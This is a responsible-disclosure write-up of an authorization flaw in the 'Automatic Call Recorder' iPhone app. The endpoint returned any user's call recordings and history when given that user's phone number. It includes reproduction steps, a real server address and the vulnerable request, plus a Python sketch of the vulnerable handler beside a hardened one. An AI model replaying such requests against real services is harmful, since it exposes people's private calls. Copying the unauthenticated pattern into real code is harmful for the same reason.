

This vulnerability was responsibly disclosed by Anand Prakash, PingSafe, and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.

The “Automatic call recorder” application is one of the popular applications used by iPhone users to record their calls.

The app is among the top-grossing apps in the Business category of the App Store and is currently ranked #15 by downloads in the Business category worldwide.

Summary

We discovered this vulnerability while doing open-source intelligence across mobile applications in different categories. PingSafe decompiled the IPA file and figured out S3 buckets, hostnames, and other sensitive details used by the application.

The vulnerability allowed any malicious actor to listen to any user’s call recordings: the recordings were served from the application’s cloud storage bucket, and an unauthenticated API endpoint leaked the cloud storage URL of the victim’s data.

Cloud Risk Description

This vulnerability existed in the “/fetch-sinch-recordings.php” API endpoint of the “Automatic Call Recorder” application. An attacker can pass another user’s number in the recordings request, and the API responds with the recording URL in the storage bucket without any authentication. The response also leaks the victim’s entire call history and the numbers on which calls were made.

Steps to Reproduce

  1. Install the “Automatic Call Recorder” application on your phone.
  2. Intercept the application’s traffic in Burp Suite or ZAP Proxy.
  3. You will observe a POST request to 167.88.123.157:80/fetch-sinch-recordings.php; change UserID to the victim’s phone number with country code.
  4. The response will contain an S3 URL for the recording and other sensitive details.

Reference – An attacker can pass another user’s number in the recordings request

Vulnerable Request

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
 "UserID": "xxxxxx",
 "AppID": "xxx"
}
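The root cause is that the caller-supplied UserID alone selects whose data is returned, with no authentication on the endpoint. As an added example (not the app’s code or PingSafe’s), the following Python sketch contrasts that behaviour with a hardened handler that takes identity from a verified session and hands out short-lived signed URLs instead of bare bucket paths; the session tokens, phone numbers, object keys and signing key are constructed placeholders.

```python
import hmac, hashlib, time
from typing import Optional

# Constructed sample data: verified session tokens -> phone number of the authenticated caller.
SESSIONS = {"tok-alice": "+15551230001", "tok-bob": "+15551230002"}
# Constructed sample data: recordings keyed by owner number (private object keys, not public URLs).
RECORDINGS = {
    "+15551230001": ["rec/alice/2021-03-01.m4a"],
    "+15551230002": ["rec/bob/2021-03-02.m4a"],
}
SIGNING_KEY = b"placeholder-server-side-secret"  # assumption: stays server side, never shipped in the IPA

def vulnerable_fetch(body: dict) -> list:
    """Mirrors the reported flaw: whatever UserID the request carries selects whose data comes back."""
    return RECORDINGS.get(body.get("UserID"), [])

def signed_url(key: str, ttl: int = 300, now: Optional[int] = None) -> str:
    """Time-limited, HMAC-signed URL; the bucket itself stays private and the URL expires after ttl seconds."""
    exp = (now if now is not None else int(time.time())) + ttl
    sig = hmac.new(SIGNING_KEY, f"{key}:{exp}".encode(), hashlib.sha256).hexdigest()
    return f"https://recordings.example.invalid/{key}?exp={exp}&sig={sig}"

def verify_signed_url(url: str, now: Optional[int] = None) -> bool:
    """Server-side check of a signed URL: rejects expired links and any tampering with key, exp or sig."""
    path, _, query = url.partition("?")
    key = path.split("/", 3)[3]
    params = dict(p.split("=", 1) for p in query.split("&"))
    exp = int(params["exp"])
    expected = hmac.new(SIGNING_KEY, f"{key}:{exp}".encode(), hashlib.sha256).hexdigest()
    current = now if now is not None else int(time.time())
    return current <= exp and hmac.compare_digest(expected, params.get("sig", ""))

def hardened_fetch(headers: dict, body: dict) -> dict:
    """Identity comes from the verified session, never from the request body."""
    auth = headers.get("Authorization", "")
    token = auth[len("Bearer "):] if auth.startswith("Bearer ") else ""
    owner = SESSIONS.get(token)
    if owner is None:
        return {"status": 401, "error": "authentication required"}
    # A body UserID that disagrees with the session is refused; a real service would also log it.
    requested = body.get("UserID")
    if requested is not None and requested != owner:
        return {"status": 403, "error": "UserID does not match authenticated user"}
    return {"status": 200, "recordings": [signed_url(k) for k in RECORDINGS.get(owner, [])]}
```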
